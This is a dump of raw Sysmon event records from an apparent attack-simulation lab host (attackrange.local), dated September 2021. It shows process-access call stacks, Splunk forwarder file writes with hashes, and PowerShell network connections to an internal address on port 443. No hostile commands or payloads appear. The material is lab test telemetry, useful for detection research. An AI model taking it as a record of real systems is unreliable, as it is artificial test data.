18:17:32.850{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035085968Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:32.850{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085967Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:32.850{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035085966Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:32.571{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A7992F830620EB67651B608BB68BD0F1,SHA256=BE5590E8DCDC246D87016E2932C0CBBCB5B2A946F71BC463527AE8EBBE7A7F57,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085965Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:32.535{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D062A4ECC83D62BBCE4B4D820122B985,SHA256=1D17356F176FCA292650497947822D62114AFA2248B6B1FF7238799EAD8A2E66,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085964Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:32.450{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3152E643F4509191F83E77E477DE7353,SHA256=6DE8188FE23F71644E3C5EDB5D7540CB6F71767335C98CA8F3F624ADAE445E84,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085971Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:57.882{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56781-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085970Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:33.468{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=684FBAD8242B0A51A822FE2D36B61089,SHA256=697046DC8FCBEF604A018D0D91B6F2F5139F1BD6A69C915464A327D22ECB3034,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085974Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:34.502{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AA906ACA621208E48DFEADE94668477,SHA256=13D8C40DE17DFB4D58B082002631BA52DA04F2A622AA330B5A53CA2E7FE3D9F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085973Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:58.113{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56782-false10.0.1.12-8000- 23542300x800000000000000035085972Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:34.033{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1753594DD33CBA30E1FEDDBE2F33EC0F,SHA256=44B6904A7287D89663F272F0741ED71A4F057924972F75113F3C66D95756975F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035085975Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:35.532{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED991FD83C752D8B5429D20CE181479A,SHA256=DF935A256501028FDF3D35BDAD14C07444174135F0F296CB534E5AD62E3B98F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085977Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:36.547{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB3E2DB40805691A8822BF887FDB6E7C,SHA256=8DBD6786CAE867FB2102F608C3AF01839609BE718993534D3488B7429224D6B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085976Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:36.447{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=EDB17AFA8F2B3A0EF8A2C71F7A2B6AAD,SHA256=931A6A00BBBD9EB15880C12843ABD93731E3A8DCF633B6E6844AFA416388259A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085978Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:37.564{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA958142D116D907B7EC447E7377E995,SHA256=BE47F231568CA66694158AC6C85E777A514D2725A2F50931439DE3236FE77EE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085979Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:38.629{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C55D6FF6375E56E85F005E018FC7611,SHA256=BBF285CCB80380E8D8192D9478E15F65CAE36979AC3BE3AC62A933067C4C3239,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085981Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:39.644{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F08552902E55CD5B00B27DC66B8FFCAD,SHA256=C543B729F066DA8C6915223CFCCA277DDBD3AD510A057375BA756C570FD9FAE6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085980Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.171{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56783-false10.0.1.12-8000- 23542300x800000000000000035085984Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:40.661{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7364B6E13F5171E4D6F240C3E4D51102,SHA256=DE186129B355CB18064E466F4759E0A21A433CEF745D3B319545792DDD0ECDFA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085983Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:04.855{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56784-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085982Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:39.997{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1A03CCE64B2F137EC3DA2BDA2AB517D7,SHA256=4B9FDADD40C0387AF47605DFD993013588DCD50EDD8F41F4B8666F0184E8DB31,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085985Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:41.679{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65050DF3B5A2CCD9CB04651C699A91D9,SHA256=BBA3090113FB3EF3431785FF1ACE98E81383E387217A303551802B89F09C57A8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085986Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:42.694{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB4D489004025C1DFA56E8896590558B,SHA256=38FF313DA0123C4CFB40D79BB036EBD66746CADD1CA5E49C9330BC94F6B8B343,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085996Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:43.777{B81B27B7-4FC7-613A-7990-03000000C801}65325416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035085995Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:43.708{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C77C48C585523D7C0E6E2C4A29B74BFC,SHA256=563F0E3F8DC1825A7C3A3C45CFBDF13886E1477539367CB80F50110765FC45FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085994Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:43.592{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4FC7-613A-7990-03000000C801}6532C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085993Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:43.592{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085992Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:43.592{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085991Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:43.592{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085990Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:43.592{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085989Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:43.592{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4FC7-613A-7990-03000000C801}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085988Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:43.592{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4FC7-613A-7990-03000000C801}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085987Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:43.578{B81B27B7-4FC7-613A-7990-03000000C801}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035086018Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.876{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA37CABFF967386E5DBDD6C6799E0D0E,SHA256=42A80732C16007B3339A34EFCA6D0B336A05A4653D68EF662281F875DBAFE719,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086017Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:44.860{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D747F8D5A4506A9A8EB625670E64DA47,SHA256=CB3BF189FBEB79A61CCDD81FBAE77243E5FD52614F31B70899947535EE58507E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086016Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.739{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4FC8-613A-7B90-03000000C801}1032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086015Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.739{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035086014Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.739{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086013Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 